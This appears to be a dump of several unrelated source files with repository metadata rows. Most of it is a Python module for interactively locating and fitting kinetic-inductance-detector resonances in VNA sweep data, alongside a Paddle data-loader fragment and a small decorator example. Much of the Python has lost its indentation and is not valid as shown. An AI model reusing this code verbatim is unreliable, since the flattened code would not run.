local_rank = fleet.worker_index()
# Build the indexed mapping if not exist.
if local_rank == 0 and \
not os.path.isfile(indexmap_filename):
print(' > WARNING: could not find index map file {}, building '
'the indices on rank 0 ...'.format(indexmap_filename))
# Make sure the types match the helpers input types.
assert indexed_dataset.doc_idx.dtype == np.int64
print(indexed_dataset.sizes.dtype)
assert indexed_dataset.sizes.dtype == np.int32
# Build samples mapping
verbose = local_rank == 0
start_time = time.time()
        print_rank_0(' > building samples index mapping for {} ...'.format(
name))
# First compile and then import.
if local_rank == 0:
compile_helper()
import data_tools.helpers as helpers
samples_mapping = helpers.build_mapping(
indexed_dataset.doc_idx, indexed_dataset.sizes, num_epochs,
max_num_samples, max_seq_length, short_seq_prob, seed, verbose, 2
if binary_head else 1)
        print_rank_0(' > done building samples index mapping')
np.save(indexmap_filename, samples_mapping, allow_pickle=True)
print_rank_0(' > saved the index mapping in {}'.format(
indexmap_filename))
# Make sure all the ranks have built the mapping
        print_rank_0(' > elapsed time to build and save samples mapping '
'(seconds): {:4f}'.format(time.time() - start_time))
else:
while True:
if (not os.path.isfile(indexmap_filename)):
time.sleep(3)
else:
try:
np.load(indexmap_filename, allow_pickle=True, mmap_mode='r')
break
except Exception as e:
print(
"%s file is still writing or damaged, please wait a moment."
% indexmap_filename)
time.sleep(3)
# This should be a barrier but nccl barrier assumes
# device_index=rank which is not the case for model
# parallel case
if paddle.distributed.get_world_size() > 1:
if paddle.in_dynamic_mode():
paddle.distributed.barrier()
# Load indexed dataset.
print_rank_0(' > loading indexed mapping from {}'.format(indexmap_filename))
start_time = time.time()
samples_mapping = np.load(
indexmap_filename, allow_pickle=True, mmap_mode='r')
print_rank_0(' loaded indexed file in {:3.3f} seconds'.format(time.time(
) - start_time))
print_rank_0(' total number of samples: {}'.format(samples_mapping.shape[
0]))
return samples_mapping
| 37.440722
| 106
| 0.583018
|
03572a7ca0e4bb0341be7c974b2c11603a11182f
| 33,774
|
py
|
Python
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | 1
|
2021-07-30T19:06:07.000Z
|
2021-07-30T19:06:07.000Z
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | 8
|
2021-04-22T20:47:48.000Z
|
2021-07-30T19:06:01.000Z
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import os
import sys
from scipy import signal, fftpack
import platform
from submm_python_routines.KIDs import resonance_fitting as rf
from matplotlib.backends.backend_pdf import PdfPages
from typing import NamedTuple
"""
Standalone version of kidPy's find_KIDs_interactive
If you have already identified most of the resonators at indexes kid_idx,
just call the interactive plot object like so
ip = InteractivePlot(f,20*np.log10(np.abs(z)),kid_idx)
If you want to use the filtering and threshold resonator finder,
call find_vna_sweep(f,z) like
ip = find_vna_sweep(f,z)
get the kid indexes out from ip.kid_idx
get the frequencies out from f[ip.kid_idx]
"""
def open_stored_sweep(savepath,load_std = False):
"""Opens sweep data
inputs:
char savepath: The absolute path where sweep data is saved
    outputs:
numpy array Is: The I values
numpy array Qs: The Q values"""
files = sorted(os.listdir(savepath))
I_list, Q_list, stdI_list, stdQ_list = [], [], [], []
for filename in files:
if filename.startswith('I'):
I_list.append(os.path.join(savepath, filename))
if filename.startswith('Q'):
Q_list.append(os.path.join(savepath, filename))
if filename.startswith('stdI'):
stdI_list.append(os.path.join(savepath, filename))
if filename.startswith('stdQ'):
stdQ_list.append(os.path.join(savepath, filename))
Is = np.array([np.load(filename) for filename in I_list])
Qs = np.array([np.load(filename) for filename in Q_list])
    if load_std and len(stdI_list) > 0:
        std_Is = np.array([np.load(filename) for filename in stdI_list])
        std_Qs = np.array([np.load(filename) for filename in stdQ_list])
        return Is, Qs, std_Is, std_Qs
    else:
        return Is, Qs
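# Hedged usage sketch for open_stored_sweep (the path and file layout are
# assumptions): the directory is expected to hold per-point I*.npy / Q*.npy
# files (plus optional stdI*/stdQ*) written by the sweep acquisition code, e.g.
#   Is, Qs = open_stored_sweep("/path/to/sweep_dir")
#   z = Is + 1j * Qs                      # complex S21 per tone
#   mag = 20 * np.log10(np.abs(z))        # magnitude in dB for the plots below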
class SingleWindow(NamedTuple):
left_max: int
left_fitter_pad: int
left_pad: int
left_window: int
minima: int
right_window: int
right_pad: int
right_fitter_pad: int
right_max: int
class InteractivePlot(object):
"""
Convention is to supply the data in magnitude units i.e. 20*np.log10(np.abs(z))
"""
def __init__(self, chan_freqs, data, kid_idx, f_old=None, data_old=None, kid_idx_old=None):
plt.rcParams['keymap.forward'] = ['v']
plt.rcParams['keymap.back'] = ['c', 'backspace'] # remove arrows from back and forward on plot
self.chan_freqs = chan_freqs
self.data = data
self.f_old = f_old
self.data_old = data_old
self.kid_idx_old = kid_idx_old
self.kid_idx = kid_idx
self.lim_shift_factor = 0.2
self.zoom_factor = 0.1 # no greater than 0.5
self.kid_idx_len = len(kid_idx)
self.fig = plt.figure(1000, figsize=(16, 6))
self.ax = self.fig.add_subplot(111)
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
self.fig.canvas.mpl_connect('button_press_event', self.onClick)
self.l1, = self.ax.plot(self.chan_freqs, self.data)
self.p1, = self.ax.plot(self.chan_freqs[self.kid_idx], self.data[self.kid_idx], "r*", markersize=8)
self.text_dict = {}
for i in range(0, len(self.kid_idx)):
self.text_dict[i] = plt.text(self.chan_freqs[self.kid_idx][i], self.data[self.kid_idx][i], str(i))
if isinstance(self.f_old, np.ndarray):
self.l2, = self.ax.plot(self.f_old, self.data_old, color="C0", alpha=0.25)
self.p2, = self.ax.plot(self.f_old[self.kid_idx_old], self.data_old[self.kid_idx_old], "r*", markersize=8,
alpha=0.1)
self.text_dict_old = {}
for i in range(0, len(self.kid_idx_old)):
self.text_dict_old[i] = plt.text(self.f_old[self.kid_idx_old][i], self.data_old[self.kid_idx_old][i],
str(i), color='Grey')
self.shift_is_held = False
self.control_is_held = False
self.add_list = []
self.delete_list = []
if platform.system() == 'Darwin':
print("please hold either the a or d key \n while right clicking to add or delete points")
else:
print("please hold either the shift or control key \n while right clicking to add or remove points")
print("You can use the arrow keys to pan around")
print("You can use z and x keys to zoom in and out")
print("close all plots when finished")
plt.xlabel('frequency (MHz)')
plt.ylabel('dB')
plt.show(block=True)
def on_key_press(self, event):
# mac or windows
if platform.system().lower() == 'darwin':
if event.key == 'a':
self.shift_is_held = True
if event.key == 'd':
self.control_is_held = True
else:
if event.key == 'shift':
self.shift_is_held = True
if event.key == 'control':
self.control_is_held = True
if event.key == 'right': # pan right
xlim_left, xlim_right = self.ax.get_xlim()
xlim_size = xlim_right - xlim_left
self.ax.set_xlim(xlim_left + self.lim_shift_factor * xlim_size,
xlim_right + self.lim_shift_factor * xlim_size)
plt.draw()
if event.key == 'left': # pan left
xlim_left, xlim_right = self.ax.get_xlim()
xlim_size = xlim_right - xlim_left
self.ax.set_xlim(xlim_left - self.lim_shift_factor * xlim_size,
xlim_right - self.lim_shift_factor * xlim_size)
plt.draw()
if event.key == 'up': # pan up
ylim_left, ylim_right = self.ax.get_ylim()
ylim_size = ylim_right - ylim_left
self.ax.set_ylim(ylim_left + self.lim_shift_factor * ylim_size,
ylim_right + self.lim_shift_factor * ylim_size)
plt.draw()
if event.key == 'down': # pan down
ylim_left, ylim_right = self.ax.get_ylim()
ylim_size = ylim_right - ylim_left
self.ax.set_ylim(ylim_left - self.lim_shift_factor * ylim_size,
ylim_right - self.lim_shift_factor * ylim_size)
plt.draw()
if event.key == 'z': # zoom in
xlim_left, xlim_right = self.ax.get_xlim()
ylim_left, ylim_right = self.ax.get_ylim()
xlim_size = xlim_right - xlim_left
ylim_size = ylim_right - ylim_left
self.ax.set_xlim(xlim_left + self.zoom_factor * xlim_size, xlim_right - self.zoom_factor * xlim_size)
self.ax.set_ylim(ylim_left + self.zoom_factor * ylim_size, ylim_right - self.zoom_factor * ylim_size)
plt.draw()
if event.key == 'x': # zoom out
xlim_left, xlim_right = self.ax.get_xlim()
ylim_left, ylim_right = self.ax.get_ylim()
xlim_size = xlim_right - xlim_left
ylim_size = ylim_right - ylim_left
self.ax.set_xlim(xlim_left - self.zoom_factor * xlim_size, xlim_right + self.zoom_factor * xlim_size)
self.ax.set_ylim(ylim_left - self.zoom_factor * ylim_size, ylim_right + self.zoom_factor * ylim_size)
plt.draw()
def on_key_release(self, event):
# windows or mac
if platform.system() == 'Darwin':
if event.key == 'a':
self.shift_is_held = False
if event.key == 'd':
self.control_is_held = False
else:
if event.key == 'shift':
self.shift_is_held = False
if event.key == 'control':
self.control_is_held = False
def onClick(self, event):
if event.button == 3:
if self.shift_is_held: # add point
print("adding point", event.xdata)
self.kid_idx = np.hstack((self.kid_idx, np.argmin(np.abs(self.chan_freqs - event.xdata))))
self.kid_idx = self.kid_idx[np.argsort(self.kid_idx)]
self.refresh_plot()
elif self.control_is_held: # delete point
print("removing point", event.xdata)
delete_index = np.argmin(np.abs(self.chan_freqs[self.kid_idx] - event.xdata))
self.kid_idx = np.delete(self.kid_idx, delete_index)
self.refresh_plot()
# self.delete_list.append(event.xdata)
# plt.plot(event.xdata,event.ydata,"x",markersize = 20,mew = 5)
else:
print("please hold either the shift or control key while right clicking to add or remove points")
def refresh_plot(self):
self.p1.set_data(self.chan_freqs[self.kid_idx], self.data[self.kid_idx])
for i in range(0, self.kid_idx_len):
self.text_dict[i].set_text("") # clear all of the texts
self.text_dict = {}
for i in range(0, len(self.kid_idx)):
self.text_dict[i] = plt.text(self.chan_freqs[self.kid_idx][i], self.data[self.kid_idx][i], str(i))
self.kid_idx_len = len(self.kid_idx)
plt.draw()
class InteractiveThresholdPlot(object):
def __init__(self, f_Hz, s21_mag, peak_threshold_dB, spacing_threshold_Hz=None,
window_pad_factor=1.2, fitter_pad_factor=5.0, debug_mode=False):
self.peak_threshold_dB = peak_threshold_dB
self.spacing_threshold_Hz = spacing_threshold_Hz
self.window_pad_factor = window_pad_factor
self.fitter_pad_factor = fitter_pad_factor
self.f_Hz = f_Hz
self.f_GHz = f_Hz * 1.0e-9
self.s21_mag = s21_mag
self.regions = None
self.ilo = None
self.local_minima = None
self.minima_as_windows = None
self.calc_regions()
if not debug_mode:
self.fig = plt.figure(2, figsize=(16, 6))
self.ax = self.fig.add_subplot(111)
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.l1, = self.ax.plot(self.f_GHz, self.s21_mag)
self.p1, = self.ax.plot(self.f_GHz[self.ilo], self.s21_mag[self.ilo], "r*")
self.p2, = self.ax.plot(self.f_GHz[self.local_minima], self.s21_mag[self.local_minima], "b*")
print("Press up or down to change the threshold by 0.1 dB or press t to enter a custom threshold value.")
print("Close all plots when finished")
plt.xlabel('frequency (GHz)')
plt.ylabel('dB')
self.ax.set_title(F"Threshold: 3 adjacent points under {'%2.2f' % self.peak_threshold_dB} dB.")
plt.show(block=True)
def on_key_press(self, event):
# print event.key
# has to be shift and ctrl because remote viewers only forward
# certain key combinations
# print event.key == 'd'
if event.key == 'up':
self.peak_threshold_dB = self.peak_threshold_dB + 0.1
self.refresh_plot()
if event.key == 'down':
self.peak_threshold_dB = self.peak_threshold_dB - 0.1
self.refresh_plot()
if event.key == 't':
            self.peak_threshold_dB = float(input("What threshold would you like in dB? "))
self.refresh_plot()
def refresh_plot(self):
self.calc_regions()
self.p1.set_data(self.f_GHz[self.ilo], self.s21_mag[self.ilo])
self.p2.set_data(self.f_GHz[self.local_minima], self.s21_mag[self.local_minima])
self.ax.set_title(F"Threshold: 3 adjacent points under {'%2.2f' % self.peak_threshold_dB} dB.")
plt.draw()
def calc_regions(self):
        bool_threshold = self.s21_mag < -1.0 * self.peak_threshold_dB
        # self.ilo = np.where(self.s21_mag < -1.0 * self.peak_threshold_dB)[0]
        self.ilo = []
        self.regions = []
        self.local_minima = []
        is_in_threshold_last = False
        sub_region = []
        for test_index, is_in_threshold in list(enumerate(bool_threshold)):
            if is_in_threshold:
                self.ilo.append(test_index)
                sub_region.append(test_index)
            else:
                if is_in_threshold_last:
                    # when the last point was in, but not this point it is time to finish the old region
                    self.regions.append(sub_region)
                    sub_region = []
            is_in_threshold_last = is_in_threshold
else:
if sub_region:
self.regions.append(sub_region)
window_calc_data = []
# calculate the local minima in a simple brute force method
for region in self.regions:
minima_this_region = []
minima_this_region_index = []
found_this_region = False
if len(region) > 2:
for region_index in range(len(region) - 2):
middle_region_index = region_index + 1
middle_data_index = region[middle_region_index]
left = self.s21_mag[region[region_index]]
middle = self.s21_mag[middle_data_index]
right = self.s21_mag[region[region_index + 2]]
if middle < left and middle <= right:
found_this_region = True
self.local_minima.append(middle_data_index)
minima_this_region.append(middle_data_index)
minima_this_region_index.append(middle_region_index)
if found_this_region:
window_calc_data.append((region, minima_this_region_index, minima_this_region))
# calculate the resonator windows
self.minima_as_windows = []
data_index_minima_left = None
single_window = None
right_window_not_found = False
data_index_bound = 0
for region, minima_this_region_index, minima_this_region in window_calc_data:
# deal with spacing conflicts in the same region
minima_this_region, minima_this_region_index = \
self.resolve_spacing_conflicts(minima_this_region=minima_this_region,
minima_this_region_index=minima_this_region_index)
data_index_region_bound_left = region[0]
data_index_region_bound_right = region[-1]
# combine minima in the same region with a spacing conflict
for region_index, data_index_minima in zip(minima_this_region_index, minima_this_region):
# halfway to the next resonator
if single_window is not None:
data_index_bound = int(np.round((data_index_minima_left + data_index_minima) / 2))
if right_window_not_found:
single_window["right_max"] = single_window["right_pad"] = \
single_window["right_fitter_pad"] = single_window["right_window"] = data_index_bound
else:
single_window["right_max"] = data_index_bound
test_right_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"]) \
* self.window_pad_factor))
if single_window["right_max"] < test_right_pad:
single_window["right_pad"] = single_window["right_max"]
else:
single_window["right_pad"] = test_right_pad
test_right_fitter_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"]) \
* self.fitter_pad_factor))
if single_window["right_max"] < test_right_fitter_pad:
single_window["right_fitter_pad"] = single_window["right_max"]
else:
single_window["right_fitter_pad"] = test_right_fitter_pad
self.minima_as_windows.append(SingleWindow(**single_window))
# the window where resonator is located
if region_index == minima_this_region_index[0]:
data_index_boundary_left = data_index_region_bound_left
else:
data_index_boundary_left = data_index_bound
if region_index == minima_this_region_index[-1]:
data_index_boundary_right = data_index_region_bound_right
right_window_not_found = False
else:
right_window_not_found = True
if right_window_not_found:
single_window = {"left_max": data_index_bound, "left_window": data_index_boundary_left,
"minima": data_index_minima}
else:
single_window = {"left_max": data_index_bound, "left_window": data_index_boundary_left,
"minima": data_index_minima, "right_window": data_index_boundary_right}
# window padding
test_left_pad = single_window["minima"] \
- int(np.round((single_window["minima"] - single_window["left_window"])
* self.window_pad_factor))
if test_left_pad < single_window["left_max"]:
single_window["left_pad"] = single_window["left_max"]
else:
single_window["left_pad"] = test_left_pad
test_left_fitter_pad = single_window["minima"] \
- int(np.round((single_window["minima"] - single_window["left_window"])
* self.fitter_pad_factor))
if test_left_fitter_pad < single_window["left_max"]:
single_window["left_fitter_pad"] = single_window["left_max"]
else:
single_window["left_fitter_pad"] = test_left_fitter_pad
data_index_minima_left = single_window["minima"]
else:
# finish the last step in the loop
data_index_bound = len(self.s21_mag)
if right_window_not_found:
single_window["right_max"] = single_window["right_window"] = data_index_bound
else:
single_window["right_max"] = data_index_bound
test_right_pad = single_window["minima"] + \
int(np.round((single_window["right_window"] - single_window["minima"])
* self.window_pad_factor))
if single_window["right_max"] < test_right_pad:
single_window["right_pad"] = single_window["right_max"]
else:
single_window["right_pad"] = test_right_pad
test_right_fitter_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"])
* self.fitter_pad_factor))
if single_window["right_max"] < test_right_fitter_pad:
single_window["right_fitter_pad"] = single_window["right_max"]
else:
single_window["right_fitter_pad"] = test_right_fitter_pad
self.minima_as_windows.append(SingleWindow(**single_window))
self.local_minima = [single_window.minima for single_window in self.minima_as_windows]
# spacing conflicts across all regions
self.local_minima, self.minima_as_windows = \
self.resolve_spacing_conflicts(minima_this_region=self.local_minima,
minima_this_region_index=self.minima_as_windows)
def resolve_spacing_conflicts(self, minima_this_region, minima_this_region_index):
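        """
        Resolve spacing conflicts between minima in the same region: whenever two
        minima are closer in frequency than self.spacing_threshold_Hz, keep the
        deeper one (lower S21 magnitude), drop the other, and re-check.
        """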
found_spacing_conflict = True
while found_spacing_conflict:
found_spacing_conflict = False
number_of_minima_this_region = len(minima_this_region)
if number_of_minima_this_region > 1:
for counter in range(number_of_minima_this_region - 1):
data_index_minima_left_test = minima_this_region[counter]
data_index_minima_right_test = minima_this_region[counter + 1]
minima_spacing_Hz = abs(
self.f_Hz[data_index_minima_left_test] - self.f_Hz[data_index_minima_right_test])
if minima_spacing_Hz < self.spacing_threshold_Hz:
# minima are too close:
print(F"Spacing Conflict in same threshold region.")
print(F" Allowed spacing (MHz): {'%3.3f' % (self.spacing_threshold_Hz * 1.0e-6)}")
print(F" Minima spacing (MHz): {'%3.3f' % (minima_spacing_Hz * 1.0e-6)}")
# keep the lowest of the minima
value_left_minima = self.s21_mag[data_index_minima_left_test]
value_right_minima = self.s21_mag[data_index_minima_right_test]
if value_left_minima < value_right_minima:
index_location_to_remove = counter + 1
index_location_to_keep = counter
else:
index_location_to_remove = counter
index_location_to_keep = counter + 1
# data for the print statement
data_index_kept = minima_this_region[index_location_to_keep]
data_index_removed = minima_this_region[index_location_to_remove]
value_kept_minima = self.s21_mag[data_index_kept]
f_MHz_kept_minima = self.f_GHz[data_index_kept] * 1.0e3
value_removed_minima = self.s21_mag[data_index_removed]
f_MHz_removed_minima = self.f_GHz[data_index_removed] * 1.0e3
# where the data is removed
minima_this_region_index.pop(index_location_to_remove)
minima_this_region.pop(index_location_to_remove)
# make the users see what decisions the code is making
print(F"Minima Kept: {value_kept_minima} dbM at {'%3.3f' % f_MHz_kept_minima} MHz")
print(F"Minima Removed: {value_removed_minima} dbM at {'%3.3f' % f_MHz_removed_minima} MHz\n")
# stop the loop here and restart from scratch with one less minima
found_spacing_conflict = True
break
return minima_this_region, minima_this_region_index
def compute_dI_and_dQ(I, Q, freq=None, filterstr='SG', do_deriv=True):
"""
Given I,Q,freq arrays
input filterstr = 'SG' for sav-gol filter with builtin gradient, 'SGgrad' savgol then apply gradient to filtered
do_deriv: if want to look at filtered non differentiated data.
"""
if freq is None:
df = 1.0
else:
df = freq[1] - freq[0]
dI = filtered_differential(I, df, filtertype=filterstr, do_deriv=do_deriv)
dQ = filtered_differential(Q, df, filtertype=filterstr, do_deriv=do_deriv)
return dI, dQ
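# Example usage (illustrative sketch; I, Q and freq are assumed to be 1-D arrays from a frequency sweep):
# dI, dQ = compute_dI_and_dQ(I, Q, freq=freq, filterstr='SG', do_deriv=True)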
def filtered_differential(data, df, filtertype=None, do_deriv=True):
"""
take 1d array data with spacing df. return filtered version of data depending on filterrype
"""
window = 13
n = 3
if filtertype is None:
out = np.gradient(data, df)
elif filtertype.lower() == 'sg':
if do_deriv == True:
out = signal.savgol_filter(data, window, n, deriv=1, delta=df)
else:
out = signal.savgol_filter(data, window, n, deriv=0, delta=df)
elif filtertype.lower() == 'sggrad':
tobegrad = signal.savgol_filter(data, window, n)
out = np.gradient(tobegrad, df)
else:
raise KeyError(F"filtertype: {filtertype} is not recognized.")
return out
def filter_trace(path, bb_freqs, sweep_freqs):
chan_I, chan_Q = open_stored_sweep(path)
channels = np.arange(np.shape(chan_I)[1])
mag = np.zeros((len(bb_freqs), len(sweep_freqs)))
chan_freqs = np.zeros((len(bb_freqs), len(sweep_freqs)))
for chan in channels:
mag[chan] = (np.sqrt(chan_I[:, chan] ** 2 + chan_Q[:, chan] ** 2))
chan_freqs[chan] = (sweep_freqs + bb_freqs[chan]) / 1.0e6
# mag = np.concatenate((mag[len(mag)/2:], mag[0:len(mag)/2]))
mags = 20 * np.log10(mag / np.max(mag))
mags = np.hstack(mags)
# chan_freqs = np.concatenate((chan_freqs[len(chan_freqs)/2:],chan_freqs[0:len(chan_freqs)/2]))
chan_freqs = np.hstack(chan_freqs)
return chan_freqs, mags
def lowpass_cosine(y, tau, f_3db, width, padd_data=True):
    # padd_data = True means we are going to add symmetric copies of the data to the start and stop
# to reduce/eliminate the discontinuities at the start and stop of a dataset due to filtering
#
# False means we're going to have transients at the start and stop of the data
# kill the last data point if y has an odd length
if np.mod(len(y), 2):
y = y[0:-1]
    # add the padding
# so, make a backwards copy of the data, then the data, then another backwards copy of the data
if padd_data:
y = np.append(np.append(np.flipud(y), y), np.flipud(y))
# take the FFT
ffty = fftpack.fft(y)
ffty = fftpack.fftshift(ffty)
# make the companion frequency array
delta = 1.0 / (len(y) * tau)
nyquist = 1.0 / (2.0 * tau)
freq = np.arange(-nyquist, nyquist, delta)
# turn this into a positive frequency array
print((len(ffty) // 2))
pos_freq = freq[(len(ffty) // 2):]
# make the transfer function for the first half of the data
i_f_3db = min(np.where(pos_freq >= f_3db)[0])
f_min = f_3db - (width / 2.0)
i_f_min = min(np.where(pos_freq >= f_min)[0])
f_max = f_3db + (width / 2.0)
i_f_max = min(np.where(pos_freq >= f_max)[0])
transfer_function = np.zeros(len(y) // 2)
transfer_function[0:i_f_min] = 1
transfer_function[i_f_min:i_f_max] = (1 + np.sin(-np.pi * ((freq[i_f_min:i_f_max] - freq[i_f_3db]) / width))) / 2.0
transfer_function[i_f_max:(len(freq) // 2)] = 0
# symmetrize this to be [0 0 0 ... .8 .9 1 1 1 1 1 1 1 1 .9 .8 ... 0 0 0] to match the FFT
transfer_function = np.append(np.flipud(transfer_function), transfer_function)
# apply the filter, undo the fft shift, and invert the fft
filtered = np.real(fftpack.ifft(fftpack.ifftshift(ffty * transfer_function)))
# remove the padd, if we applied it
if padd_data:
filtered = filtered[(len(y) // 3):(2 * (len(y) // 3))]
# return the filtered data
return filtered
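# Example usage (illustrative sketch, mirroring the call made in find_vna_sweep below;
# the 5 MHz smoothing scale is an assumption):
# filtered = lowpass_cosine(y=s21_mags, tau=f_Hz[1] - f_Hz[0],
#                           f_3db=1.0 / 5.0e6, width=0.1 * (1.0 / 5.0e6), padd_data=True)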
def find_vna_sweep(f_Hz, z, smoothing_scale_Hz=5.0e6, spacing_threshold_Hz=1.0e5):
"""
f is frequencies (Hz)
z is complex S21
Smoothing scale (Hz)
spacing threshold (Hz)
"""
# first plot data and filter function before removing filter function
s21_mags = 20 * np.log10(np.abs(z))
filtermags = lowpass_cosine(y=s21_mags,
tau=f_Hz[1] - f_Hz[0],
f_3db=1. / smoothing_scale_Hz,
width=0.1 * (1.0 / smoothing_scale_Hz),
padd_data=True)
    # the cosine filter drops the last point if the array has an odd number of points
len_filtered = len(filtermags)
s21_mags = s21_mags[:len_filtered]
f_Hz = f_Hz[:len_filtered]
f_GHz = f_Hz * 1.0e-9
# calculations for peak spacing (rejection based on threshold)
highpass_mags = s21_mags - filtermags
# results plot for filter
plt.figure(2)
plt.plot(f_GHz, s21_mags, 'b', label='#nofilter')
plt.plot(f_GHz, filtermags, 'g', label='Filtered')
plt.xlabel('frequency (GHz)')
plt.ylabel('dB')
plt.legend()
plt.show()
# identify peaks using the interactive threshold plot
ipt = InteractiveThresholdPlot(f_Hz=f_Hz,
s21_mag=highpass_mags,
peak_threshold_dB=1.5,
spacing_threshold_Hz=spacing_threshold_Hz)
# Zero everything but the resonators
highpass_mags[highpass_mags > -1.0 * ipt.peak_threshold_dB] = 0
    # the spacing thresholding was moved to be inside the interactive threshold class
kid_idx = ipt.local_minima
ip = InteractivePlot(f_Hz, highpass_mags, kid_idx)
return ip
def slice_vna(f, z, kid_index, q_slice=2000):
# make f in Hz for fitting
# Q = f/(delta f) for fitting is determined by the lowest frequencies assumed to be at index 0
# delta f = f/Q
df = f[1] - f[0]
n_iq_points = int(f[0] / q_slice // df)
print(n_iq_points)
res_freq_array = np.zeros((len(kid_index), n_iq_points))
res_array = np.zeros((len(kid_index), n_iq_points)).astype('complex')
print(res_array.dtype)
for i in range(0, len(kid_index)):
a = kid_index[i] - n_iq_points // 2 - 1
b = kid_index[i] + n_iq_points // 2
res_freq_array[i, :] = f[a:b]
res_array[i, :] = z[a:b]
# if i == 4:
# plt.plot(res_freq_array[i,:],20*np.log10(np.abs(res_array[i,:])))
if i < len(kid_index) - 1: # dont check last res
# print(i)
if kid_index[i + 1] - kid_index[i] < n_iq_points: # collision at higher frequency
high_cutoff = int((kid_index[i + 1] + kid_index[i]) / 2)
# print(i,a,high_cutoff,b)
res_freq_array[i, high_cutoff - a:] = np.nan
res_array[i, high_cutoff - a:] = np.nan * (1 + 1j)
if i != 0: # dont check first res
# print(i)
if kid_index[i] - kid_index[i - 1] < n_iq_points:
low_cutoff = int((kid_index[i] + kid_index[i - 1]) / 2)
# print(i,a,low_cutoff,b)
res_freq_array[i, :low_cutoff - a] = np.nan
res_array[i, :low_cutoff - a] = np.nan * (1 + 1j)
# if i == 4:
# plt.plot(res_freq_array[i,:],20*np.log10(np.abs(res_array[i,:])),'--')
# plt.show()
return res_freq_array, res_array
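# Example usage (illustrative sketch; f, z and kid_index would typically come from find_vna_sweep):
# res_freq_array, res_array = slice_vna(f, z, kid_index, q_slice=2000)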
def fit_slices(res_freq_array, res_array, do_plots=True, plot_filename='fits'):
pdf_pages = PdfPages(plot_filename + ".pdf")
fits_dict_mag = {}
fits_dict_iq = {}
for i in range(0, res_freq_array.shape[0]):
if do_plots:
fig = plt.figure(i, figsize=(12, 6))
try:
fit = rf.fit_nonlinear_iq(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
res_array[i, :][~np.isnan(res_array[i, :])])
fits_dict_iq[i] = fit
if do_plots:
plt.subplot(121)
plt.plot(np.real(res_array[i, :]), np.imag(res_array[i, :]), 'o', label='data')
plt.plot(np.real(fit['fit_result']), np.imag(fit['fit_result']), label='fit')
plt.plot(np.real(fit['x0_result']), np.imag(fit['x0_result']), label='guess')
plt.legend()
except:
print("could not fit")
fits_dict_iq[i] = 'bad fit'
try:
fit2 = rf.fit_nonlinear_mag(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
res_array[i, :][~np.isnan(res_array[i, :])])
fits_dict_mag[i] = fit2
if do_plots:
plt.subplot(122)
plt.plot(res_freq_array[i, :], 20 * np.log10(np.abs(res_array[i, :])), label='data')
plt.plot(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
10 * np.log10(np.abs(fit2['fit_result'])), label='fit')
plt.plot(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
10 * np.log10(np.abs(fit2['x0_result'])), label='guess')
plt.legend()
except:
print("could not fit")
fits_dict_mag[i] = 'bad fit'
pdf_pages.savefig(fig)
plt.close()
pdf_pages.close()
return fits_dict_iq, fits_dict_mag
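# Example usage (illustrative sketch; res_freq_array and res_array come from slice_vna above):
# fits_dict_iq, fits_dict_mag = fit_slices(res_freq_array, res_array, do_plots=True, plot_filename='fits')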
def retune_vna(f, z, kid_index, n_points_look_around=0, look_low_high=[0, 0], f_old=None, z_old=None,
kid_index_old=None):
"""
This is a program for when the resonances move and you need to retune the indexes of the resonators
use n_point_look_around = 10 to look to lower and higher frequencies within 10 data points to find a new min
use look_left_right = [10,20] to look for a new min 10 points to the lower frequencies and 20 points to higher frequencies
if you would like to have the old data and kid indexes displayed in the background suppy
f_old, z_old, kid_index old
"""
if n_points_look_around > 0:
for i in range(0, len(kid_index)):
new_index = np.argmin(
20 * np.log10(np.abs(z[kid_index[i] - n_points_look_around:kid_index[i] + n_points_look_around]))) + \
kid_index[i] - n_points_look_around
kid_index[i] = new_index
ip = InteractivePlot(f, 20 * np.log10(np.abs(z)), kid_index, f_old=f_old, data_old=20 * np.log10(np.abs(z_old)),
kid_idx_old=kid_index_old)
return ip
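# Example usage (illustrative sketch; f, z and kid_index come from an earlier sweep/retune step):
# ip = retune_vna(f, z, kid_index, n_points_look_around=10)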
| 47.838527
| 126
| 0.590454
|
7444ae4b35cbffa2905470be0a0e2d249b489126
| 743
|
py
|
Python
|
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
def decorator_with_argument(arg1, arg2):
"""
Function decorator with arguments
:param arg1: (int) first argument
:param arg2: (int) second argument
:return: function decorated
"""
def inner_function(func_to_decorate):
def wrapper(*args, **kwargs):
print(f"Enter decorator with arguments: {arg1} & {arg2}")
# Something before
response = func_to_decorate(*args, **kwargs)
# Something after
return response
return wrapper
return inner_function
@decorator_with_argument("arg1", "arg2")
def print_arguments(*args):
for arg in args:
print(arg)
if __name__ == '__main__':
print_arguments(1, 2, 3)
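    # Expected output: the wrapper prints its banner, then each positional argument:
    # Enter decorator with arguments: arg1 & arg2
    # 1
    # 2
    # 3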
| 24.766667
| 69
| 0.628533
|
f6dcfa4366444b4b8367dc0a1ee266fd35f33a25
| 3,350
|
py
|
Python
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
